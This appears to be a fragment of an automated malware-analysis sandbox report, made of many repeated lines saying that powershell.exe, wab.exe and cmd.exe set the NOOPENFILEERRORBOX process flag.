Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
